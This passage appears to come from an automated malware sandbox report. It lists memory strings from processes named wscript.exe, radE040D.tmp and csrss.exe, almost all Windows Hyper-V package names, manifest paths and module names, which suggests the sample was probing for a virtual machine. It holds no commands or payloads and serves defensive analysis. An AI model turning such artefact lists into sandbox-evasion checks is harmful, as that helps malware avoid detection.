Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1at
Source: csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.17134.1_none_d74ad2482ffdcb42\amd64_dual_wvmic_heartbeat.inf_31bf3856ad364e35_10.0.17134.1_none_8f1854ea8397fa4d\amd64_dual_xboxgipsynthetic.inf_31bf3856ad364e35_10.0.17134.1_none_01e5cd3901fe7446\amd64_dual_wudfusbcciddriver.inf_31bf3856ad364e35_10.0.17134.1_none_3acf25bb0f3d80b9\amd64_dual_rtwlanu_oldic.inf_31bf3856ad364e35_10.0.17134.1_none_2fc0fce011dfb3bb\amd64_dual_wvmic_timesync.inf_31bf3856ad364e35_10.0.17134.1_none_e4bc66a832e3dbff\3240amd64_e2xw10x64.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_3f995ebb761ce9ea\amd64_dual_transfercable.inf_31bf3856ad364e35_10.0.17134.1_none_d402232d8ab51364\amd64_dual_wmbclass_wmc_union.inf_31bf3856ad364e35_10.0.17134.1_none_f0e56a6391b6ebc2\amd64_dual_sensorsalsdriver.inf_31bf3856ad364e35_10.0.17134.1_none_847807b0cdf36679\amd64_dual_rdcameradriver.inf_31bf3856ad364e35_10.0.17134.1_none_2ca8891b3aeaacbd\amd64_dual_tsusbhubfilter.inf_31bf3856ad364e35_10.0.17134.1_none_8abfd8e8cc7b9e4c\amd64_dual_tsgenericu
Source: radE040D.tmp, 00000004.00000003.7165507190.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..edstorage.resources_31bf3856ad364e35_10.0.17134.1_en-us_bdfc93ec7698eb64\
Source: radE040D.tmp, 00000004.00000003.7130819819.000000000316B000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-Package
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat4.1uUp
Source: radE040D.tmp, 00000004.00000003.7062337228.0000000003122000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.17134.1_en-us_e3616de0d25a48c4\
Source: radE040D.tmp, 00000004.00000003.7168918444.00000000030F8000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat1.mum
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vmbus_31bf3856ad364e35_10.0.17134.1_none_bcf0637138185dcf.manifestK
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmp, csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.17134.1_none_84e0eedae46f7b9b\
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..ommon-vm-deployment_31bf3856ad364e35_10.0.17134.1_none_f5e4ea96fd9fee6d.manifest
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.17134.1_none_69e85823c476b806\nvspinfo.exell
Source: radE040D.tmp, 00000004.00000003.7165507190.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmpBinary or memory string: amd64_dual_sensorsalsdriver.inf_31bf3856ad364e35_10.0.17134.1_none_847807b0cdf36679\amd64_dual_usbcciddriver.inf_31bf3856ad364e35_10.0.17134.1_none_4070b1e28eb5028d\amd64_dual_rtwlanu_oldic.inf_31bf3856ad364e35_10.0.17134.1_none_2fc0fce011dfb3bb\amd64_dual_tsgenericusbdriver.inf_31bf3856ad364e35_10.0.17134.1_none_ca286e9e3a6bdb60\amd64_dual_rdcameradriver.inf_31bf3856ad364e35_10.0.17134.1_none_2ca8891b3aeaacbd\amd64_dual_wmbclass_wmc_union.inf_31bf3856ad364e35_10.0.17134.1_none_f0e56a6391b6ebc2\amd64_dual_wvmic_timesync.inf_31bf3856ad364e35_10.0.17134.1_none_e4bc66a832e3dbff\970amd64_dual_wudfusbcciddriver.inf_31bf3856ad364e35_10.0.17134.1_none_3acf25bb0f3d80b9\amd64_dual_tsusbhubfilter.inf_31bf3856ad364e35_10.0.17134.1_none_8abfd8e8cc7b9e4c\amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.17134.1_none_d74ad2482ffdcb42\amd64_dual_wvmic_shutdown.inf_31bf3856ad364e35_10.0.17134.1_none_36194d50cbafa987\amd64_dual_wvmic_kvpexchange.inf_31bf3856ad364e35_10.0.17134.1_none_3386da29bb1b0b2f\amd64_e2xw10x64.inf
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.17134.1_en-us_9c3432f847f5f8f0.manifest
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.17134.1_none_2457e84548829177.manifest
Source: radE040D.tmp, 00000004.00000003.7165507190.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat2~2
Source: radE040D.tmp, 00000004.00000003.7165507190.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.17134.1_none_e99c08352e0bfafa.manifest
Source: radE040D.tmp, 00000004.00000003.6848508580.0000000003A43000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.1_none_bb0455987cc9b004.manifest7
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-tpm.resources_31bf3856ad364e35_10.0.17134.1_en-us_259560ef1632af7b\
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.17134.1_none_7743eea1a413bb8c\RemoteFileBrowse.dl,
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat`
Source: radE040D.tmp, 00000004.00000003.7165507190.00000000030F8000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-passthru-parser_31bf3856ad364e35_10.0.17134.1_none_076f3325872ef096.manifest]
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1at.1
Source: radE040D.tmp, 00000004.00000003.7131128591.000000000316C000.00000004.sdmp Binary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat.catp
Source: radE040D.tmp, 00000004.00000003.7127160132.000000000310D000.00000004.sdmp Binary or memory string: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat.catnvI
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-passthru-parser_31bf3856ad364e35_10.0.17134.1_none_076f3325872ef096\
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumV~
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1mA
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-p..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_7fb4b9d31b9d09e8.manifest
Source: radE040D.tmp, 00000004.00000003.7131128591.000000000316C000.00000004.sdmp Binary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catcat
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmp Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.17134.1_none_69e85823c476b806\VmsProxyHNic.sysi
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmp, csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-vstack-vmsp_31bf3856ad364e35_10.0.17134.1_none_1ac175bdc8f2a7d7\
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catT
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-o..group-vm-deployment_31bf3856ad364e35_10.0.17134.1_none_88bd3c16c482b637.manifest
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-vstack-computelib_31bf3856ad364e35_10.0.17134.1_none_9321c5b124bca3df\`
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmp, csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.17134.1_none_8ce33edadf477e7a\
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.17134.1_none_e6683e9b0956ac05.manifest
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-vstack-vmsp_31bf3856ad364e35_10.0.17134.1_none_1ac175bdc8f2a7d7.manifestHV
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.17134.1_none_c35bb6c84d5e4ad0.manifest
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmp Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-3dvideo.resources_31bf3856ad364e35_10.0.17134.1_en-us_49c786157c795a73\vmsynth3dvideo.dll.muiN
Source: radE040D.tmp, 00000004.00000003.7165507190.00000000030F8000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.17134.1_en-us_aea0b368e53cc261\
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmp Binary or memory string: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat.cat/
Source: radE040D.tmp, 00000004.00000003.7131622681.0000000003178000.00000004.sdmp Binary or memory string: C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catt.cat
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-3dvideo.resources_31bf3856ad364e35_10.0.17134.1_en-us_49c786157c795a73.manifest
Source: radE040D.tmp, 00000004.00000002.8062573216.0000000003FBE000.00000004.sdmp Binary or memory string: VwsuEoyeix9nBff1PrdwzfLTAJjzRtwmrJlLCertvSI+T8uVmciRAgMBAAE=
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-vstack_31bf3856ad364e35_10.0.17134.1_none_4a3dff595d47ce04.manifestest
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-d..ers-vmswitch-common_31bf3856ad364e35_10.0.17134.1_none_156e07c0687fe777.manifest
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.1_none_bb0455987cc9b004\P
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumt
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat4.1
Source: csrss.exe, 00000005.00000002.6845367603.00000000038C6000.00000004.sdmp Binary or memory string: CimCmdletspsd1Hyper-V.psd1
Source: csrss.exe, 00000008.00000002.6858640583.00000000038C2000.00000004.sdmp Binary or memory string: Hyper-V.Types
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1N
Source: radE040D.tmp, 00000004.00000003.7131372553.00000000030F5000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cati
Source: radE040D.tmp, 00000004.00000003.7082846453.000000000387B000.00000004.sdmp Binary or memory string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1sm1
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumZ|
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat*W
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.muma]
Source: csrss.exe, 00000005.00000002.6845164829.00000000038A5000.00000004.sdmp Binary or memory string: C:\Windows\WinSxS\wow64_microsoft.hyperv.powershell.cmdlets.misc_31bf3856ad364e35_10.0.17134.1_none_9cb6bf37d3c2efb9\Hyper-V.Format.ps1xml.mof
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-v..edstorage.resources_31bf3856ad364e35_10.0.17134.1_en-us_bdfc93ec7698eb64.manifest
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.17134.1_none_1c1693f7c8171ba6\7\\
Source: radE040D.tmp, 00000004.00000003.7131372553.00000000030F5000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catf6f
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-vstack-tpm_31bf3856ad364e35_10.0.17134.1_none_604b83348a0c5e92\
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmp Binary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catfig
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.17134.112_none_17084bffb5c5c964\
Source: csrss.exe, 00000008.00000002.6858640583.00000000038C2000.00000004.sdmp Binary or memory string: Hyper-V.psd1d1MsDtc.psd1nk1TestDtc.psd1
Source: radE040D.tmp, 00000004.00000003.6832603675.0000000003A84000.00000004.sdmp Binary or memory string: amd64_microsoft-windows-hyper-v-dmvsc_31bf3856ad364e35_10.0.17134.1_none_8c46edec6c2bc4c5.manifest
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.17134.1_en-us_e3616de0d25a48c4\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.17134.1_none_69e85823c476b806\amd64_microsoft-hyper-v-h..rvisor-host-service_31bf3856ad364e35_10.0.17134.1_none_51d671baba10f2e8\amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.17134.1_none_7338804b0eb50c17\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.17134.1_none_3ce1277763a2249b\amd64_microsoft-hyper-v-lun-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_15c27a1250ea6310\amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.17134.1_en-us_592a4468e416a24d\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.17134.1_none_7743eea1a413bb8c\amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.17134.1_en-us_f27d2f48e22200a4\amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.17134.1_en-us_0d3e2a9bd4020545\amd64_microsoft-hyper-v-drivers-hy
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat.cat
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catat
Source: radE040D.tmp, 00000004.00000003.7168254013.0000000003127000.00000004.sdmp Binary or memory string: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum*I
Source: radE040D.tmp, 00000004.00000003.7168918444.00000000030F8000.00000004.sdmp Binary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat.mum
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-o..vices-vm-deployment_31bf3856ad364e35_10.0.17134.1_none_d43b74ba5db8d712.manifest
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.17134.1_en-us_2b9c39681a7206ff.manifest
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.17134.1_en-us_73034f3cf79a1975.manifest
Source: radE040D.tmp, 00000004.00000003.7169001015.0000000003118000.00000004.sdmp Binary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumm
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumc~
Source: wscript.exe, 00000000.00000002.6551851241.00000000054A0000.00000002.sdmp, radE040D.tmp, 00000004.00000002.7951852941.00000000035A0000.00000002.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumat}\(
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum.cat
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.48_none_cf157924edc24a05.manifest
Source: csrss.exe, 00000008.00000002.6858640583.00000000038C2000.00000004.sdmp Binary or memory string: Hyper-V.psd11Hyper-V.psd1
Source: radE040D.tmp, 00000004.00000003.7169001015.0000000003118000.00000004.sdmp Binary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-m..wallrules.resources_31bf3856ad364e35_10.0.17134.1_en-us_c011eec82bd47853.manifestu
Source: radE040D.tmp, 00000004.00000003.7082846453.000000000387B000.00000004.sdmp Binary or memory string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.Format.ps1xmlxmlls1xmll
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.17134.81_none_30736e9038d6e6ac\9177amd64_hyperv-commandline-tool.resources_31bf3856ad364e35_10.0.17134.1_en-us_d5c4e754bc26201d\amd64_hyperv-networking-switch-interface_31bf3856ad364e35_10.0.17134.1_none_cbcae0f157b5d02b\amd64_hyperv-compute-guestcomputeservice_31bf3856ad364e35_10.0.17134.137_none_6f3c182768f074fa\amd64_ialpss2i_i2c_bxt_p.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_ffa8f5f4e6504efb\amd64_hyperv-compute-eventlog.resources_31bf3856ad364e35_10.0.17134.1_en-us_522940f2f04f07f9\amd64_hyperv-vmemulateddevices.resources_31bf3856ad364e35_10.0.17134.1_en-us_a1a750046421bf96\amd64_hyperv-vmemulatednic.resources_31bf3856ad364e35_10.0.17134.1_en-us_f8bcfb31102e62eb\4faamd64_hyperv-worker-events.resources_31bf3856ad364e35_10.0.17134.1_en-us_9de5622f209a7b21\eamd64_halextintclpiodma.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_24bb2a71e75700a1\amd64_hyperv-vpci-rootporterr.resources_31bf3856ad364e35_10.0.17134.1_en-us_30ee0a3c7e36caae\3amd
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.17134.1_none_c0dbf3b2f0877a05\
Source: radE040D.tmp, 00000004.00000003.7168740992.0000000003103000.00000004.sdmp Binary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1um1
Source: radE040D.tmp, 00000004.00000003.7168918444.00000000030F8000.00000004.sdmp Binary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mummumr
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catt
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1t
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-o..-onecore-deployment_31bf3856ad364e35_10.0.17134.1_none_ca9236a4769cd0cd.manifest
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-vid_31bf3856ad364e35_10.0.17134.1_none_864a29a4e381d095.manifestest
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1t
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-vstack-tpm.resources_31bf3856ad364e35_10.0.17134.1_en-us_259560ef1632af7b.manifestt
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-storvsp_31bf3856ad364e35_10.0.17134.1_none_fabc5147bcc71691.manifest
Source: wscript.exe, 00000000.00000002.6551851241.00000000054A0000.00000002.sdmp, radE040D.tmp, 00000004.00000002.7951852941.00000000035A0000.00000002.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: radE040D.tmp, 00000004.00000003.7168254013.0000000003127000.00000004.sdmp Binary or memory string: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cattat
Source: radE040D.tmp, 00000004.00000003.7168254013.0000000003127000.00000004.sdmp Binary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum\
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumw
Source: radE040D.tmp, 00000004.00000003.7131427612.0000000003182000.00000004.sdmp Binary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum\*iE
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.17134.1_none_bd1bad59835abed8\
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmp Binary or memory string: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmp, csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmp Binary or memory string: amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.17134.1_none_14929ba5ccea66b9\
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7165507190.00000000030F8000.00000004.sdmp Binary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catHy
